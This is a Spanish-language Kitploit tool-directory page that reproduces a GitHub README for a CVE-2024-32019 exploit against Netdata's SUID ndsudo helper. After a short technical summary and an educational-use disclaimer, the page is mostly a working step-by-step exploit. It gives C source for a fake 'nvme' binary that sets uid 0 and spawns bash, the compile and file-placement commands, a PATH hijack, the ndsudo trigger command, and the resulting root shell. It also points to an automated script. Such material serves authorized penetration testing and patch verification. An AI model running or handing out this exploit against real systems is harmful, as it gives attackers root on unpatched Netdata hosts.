Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation — CVE-2024-32019 es una vulnerabilidad de escalada de privilegios local de alta gravedad en Netdata (versiones >= 1.44.0-60 < 1.45.3), causada por el uso inseguro de la variable PATH en el binario SUID ndsudo, lo que permite a los atacantes ejecutar comandos arbitrarios como root. | Kitploit
Herramientas/GitHubGitHub/dollarboysushil/cve-2024-32019-netdata-ndsudo-path-vulnerability-privilege-escalation
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de PayloadsExplotación de BinariosLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
dollarboysushil/cve-2024-32019-netdata-ndsudo-path-vulnerability-privilege-escalation

CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation

CVE-2024-32019 es una vulnerabilidad de escalada de privilegios local de alta gravedad en Netdata (versiones >= 1.44.0-60 < 1.45.3), causada por el uso inseguro de la variable PATH en el binario SUID ndsudo, lo que permite a los atacantes ejecutar comandos arbitrarios como root.

Ver RepositorioSitio web
141hace 1 añoAún no revisado

🚨 CVE-2024-32019 - Explotación de la vulnerabilidad de PATH en ndsudo de Netdata (LPE a Root)

Un exploit basado en Python para CVE-2024-32019, una vulnerabilidad de escalada de privilegios local de alta severidad en el agente de Netdata, que aprovecha un binario SUID mal configurado (ndsudo) que no maneja de forma segura la variable de entorno PATH.


[!Caution] Este código es solo para fines educativos y de pruebas autorizadas. El uso no autorizado de esta herramienta contra sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal.

🔍 Descripción general

ID de CVE: CVE-2024-32019
Puntuación CVSS: 8.8 (Alta)
Divulgado: 12 de abril de 2024
Componente: Netdata Agent
Versiones afectadas:

  • >= v1.45.0, < v1.45.3
  • >= v1.44.0-60, < v1.45.0-169

🧠 Resumen técnico

La herramienta ndsudo de Netdata es un binario SUID root diseñado para ejecutar de forma segura un conjunto limitado de comandos del sistema (como nvme) en nombre de usuarios no root.

Sin embargo, debido a un fallo de implementación, respeta la variable PATH controlada por el usuario al resolver los binarios de los comandos. Si un atacante puede manipular el PATH para incluir un directorio con permisos de escritura que contenga un binario malicioso, ndsudo lo ejecutará con privilegios de root — lo que resulta en una escalada de privilegios local.


💥 Pasos de explotación manual

Los siguientes pasos demuestran cómo explotar manualmente la vulnerabilidad en ndsudo.

1. Crear un binario de escalada de privilegios

Guarda el siguiente código C como nvme.c:

root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}

2. Compilar el exploit

root@kitploit:~
gcc nvme.c -o nvme

3. Preparar el entorno de explotación en el sistema objetivo

root@kitploit:~
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme

4. Modificar la variable PATH

root@kitploit:~
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme

5. Activar el exploit

root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Si tiene éxito, obtendrás una shell root.

root@kitploit:~
# whoami
root

Explotación automática

Si tienes acceso SSH, puedes usar CVE-2024-32019-dbs.py para automatizar esto.

Exploitation using script

📎 Referencias

  • Aviso de seguridad de GitHub
  • Puntuación CVSS: 8.8 (Alta)
  • CVE-2024-32019: Análisis y mitigación de la vulnerabilidad de Netdata
Descargar herramienta